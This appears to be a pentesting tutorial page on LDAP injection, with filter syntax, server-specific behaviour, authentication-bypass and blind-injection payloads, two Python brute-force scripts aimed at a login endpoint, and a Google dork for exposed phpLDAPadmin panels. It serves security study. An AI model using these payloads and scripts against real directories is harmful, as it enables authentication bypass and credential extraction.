LDAP Injection
Become VeryLazyTech member! ๐
Follow us on:
โ Twitter @VeryLazyTech.
๐พ Github @VeryLazyTech.
๐ Medium @VeryLazyTech.
๐บ YouTube @VeryLazyTech.
๐ฉ Telegram @VeryLazyTech.
๐ต๏ธโโ๏ธ My Site @VeryLazyTech.
Visit our shop for e-books and courses. ๐
Basic info
LDAP (Lightweight Directory Access Protocol) Injection is a security vulnerability that occurs when user input is improperly sanitized before being used in LDAP queries. Attackers can exploit this vulnerability to bypass authentication, extract sensitive data, or escalate privileges.
LDAP is used to manage and query directory services, such as Active Directory. A typical LDAP query looks like this:
(&(uid=USERNAME)(password=PASSWORD))
If the application fails to properly sanitize user input, an attacker can manipulate the query to gain unauthorized access or extract sensitive information.
LDAP
If you want to know what is LDAP access the following page:
Understanding LDAP Filters
LDAP (Lightweight Directory Access Protocol) uses filters to search for objects within a directory. These filters follow a specific syntax and can be manipulated to bypass authentication or extract information.
LDAP Filter Syntax
A basic LDAP filter follows this structure:
Filter = ( filtercomp )
filtercomp = and / or / not / item
And = & filterlist
Or = | filterlist
Not = ! filter
Filterlist = 1*filter
Item = simple / present / substring
Simple = attr filtertype assertionvalue
Filtertype = '=' / '~=' / '>=' / '<='
Present = attr = *
Substring = attr "=" [initial] * [final]
Initial = assertionvalue
Final = assertionvalue
Logical Operators:
(&)
= Absolute TRUE(|)
= Absolute FALSE
Examples:
(&(!(objectClass=Impresoras))(uid=s*))
(&(objectClass=user)(uid=*))
LDAP Behavior Across Different Implementations
Different directory servers handle LDAP filters differently:
OpenLDAP: If multiple filters arrive, only the first one is executed.
ADAM / Microsoft LDS: Throws an error when multiple filters are sent.
SunOne Directory Server 5.0: Executes both filters.
It is crucial to use proper syntax when sending LDAP queries to avoid errors. A filter should always start with &
or |
.
Example:
(&(directory=val1)(folder=public))
(&(objectClass=VALUE1)(type=Epson*))
LDAP Injection for Authentication Bypass
LDAP supports various password storage formats, including plaintext, MD5, SHA, and crypt. If passwords are hashed, direct injection of credentials may not work, but filters can still be manipulated.
Injection Examples
1. Wildcard Authentication Bypass
user=*
password=*
--> (&(user=*)(password=*))
Using *
as a wildcard allows authentication with any user/password combination.
2. Injecting Boolean Logic to Always Return True
user=*)(&
password=*)(&
--> (&(user=*)(&)(password=*)(&))
This forces a query that evaluates to TRUE, bypassing authentication.
3. Forced Admin Login
username=admin)(!(&(|
pass=any))
--> (&(uid=admin)(!(&(|)(webpassword=any))))
Since (|)
is always FALSE, the password check is bypassed.
4. Null Injection to Terminate Queries
user=*))%00
pass=any
--> (&(user=*))%00
Adding %00
(null byte) prematurely terminates the query, potentially bypassing authentication checks.
Blind LDAP Injection
Boolean-Based Blind Injection
By forcing TRUE/FALSE responses, attackers can infer the existence of valid users:
Payload: *)(objectClass=*))(&objectClass=void
Final query: (&(objectClass=*)(objectClass=*))(&objectClass=void )(type=Pepi*))
If the object exists, information is retrieved. Otherwise, no data is returned.
Extracting Data Character by Character
By iterating through ASCII characters, attackers can brute-force credentials or other sensitive attributes.
(&(sn=administrator)(password=*)) : OK
(&(sn=administrator)(password=A*)) : KO
(&(sn=administrator)(password=M*)) : OK
(&(sn=administrator)(password=MA*)) : KO
Automating LDAP Exploitation
Discovering Valid LDAP Attributes
A script can brute-force attribute names to extract available fields:
#!/usr/bin/python3
import requests
import string
proxy = { "http": "localhost:8080" }
url = "http://10.10.10.10/login.php"
alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"
attributes = ["cn", "mail", "uid", "userPassword", "sn"]
for attribute in attributes:
value = ""
finish = False
while not finish:
for char in alphabet:
query = f"*)({attribute}={value}{char}*"
data = {'login': query, 'password': 'bla'}
r = requests.post(url, data=data, proxies=proxy)
if "Cannot login" in r.text:
value += str(char)
break
if char == alphabet[-1]:
finish = True
print()
Blind Injection Without Wildcards
If *
is blacklisted, a character-by-character brute-force method can be used:
#!/usr/bin/python3
import requests, string
alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"
flag = ""
for i in range(50):
for char in alphabet:
r = requests.get(f"http://ctf.web??action=dir&search=admin*)(password={flag}{char}")
if "TRUE CONDITION" in r.text:
flag += char
print("[+] Flag: " + flag)
break
Finding Vulnerable Applications with Google Dorks
Attackers can use search queries to find exposed LDAP management interfaces:
intitle:"phpLDAPadmin" inurl:cmd.php
LDAP Injection is a critical vulnerability that allows attackers to manipulate directory queries, bypass authentication, and extract sensitive data. Proper input validation, escaping special characters, and enforcing least privilege access controls are essential to mitigating these attacks.
Lists
Learn & practice For the OSCP.
Last updated
Was this helpful?